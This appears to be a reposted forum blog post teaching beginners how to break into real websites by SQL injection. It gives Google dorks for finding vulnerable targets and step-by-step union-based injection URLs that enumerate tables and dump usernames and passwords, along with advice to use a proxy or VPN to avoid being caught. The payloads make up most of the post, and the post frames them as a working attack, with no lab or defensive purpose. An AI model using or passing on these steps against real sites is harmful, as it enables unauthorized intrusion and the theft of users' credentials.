SQL Injection Tutorial For Beginners

by February 16, 2016 0 Comments

SQL Injection Tutorial For Beginners

   




This is a tutorial for people who would like to learn how to SQL inject into a site.

FAQ

What is a SQL Injection? 

A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.

What can I do with an SQLi?

You can extract data such as passwords, usernames, locations, and also change the site in which you can put whatever you want on it.

Is it hard to do?

At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?

If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.

What is a dork?

A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable for injecting

Injection Tutorial

Step 1. Search Google by typing in a dork and clicking one of the website that show up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=

Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.

So let's say we have a site like this
Quote: Wrote:

http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
Quote: Wrote:

http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.

Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this.

Quote: Wrote:
http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error. 

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select function. After union select, write every number that leads to the number of columns, separated by a comma.

So here's how it should look:
Quote: Wrote:

http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.

Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.

Quote: Wrote:

http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).

For SQL Version 5 Injection:

Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command.

Quote: Wrote:

http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time. 

After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after .columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign. 

So after all that it should look like this:
Quote: Wrote:
http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The name of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function. 

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should look like this:

Quote: Wrote:
http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames of people should show up, then a colon, then the passwords of the usernames.

For SQL Version 4 Injection:

For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the table name, you have to guess what it is. It's not already done for you like in version 5. I suggest guessing like user or admin or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow the same steps for 5 afterwards.

Thank you for reading my tutorial, if you have any questions you can post here or PM me and I'll do the best I can to help you.

Credits to @j2

 j2


Cyber Hack

Developer

Cras justo odio, dapibus ac facilisis in, egestas eget quam. Curabitur blandit tempus porttitor. Vivamus sagittis lacus vel augue laoreet rutrum faucibus dolor auctor.

0 Comments:

JNITLover. Powered by Blogger.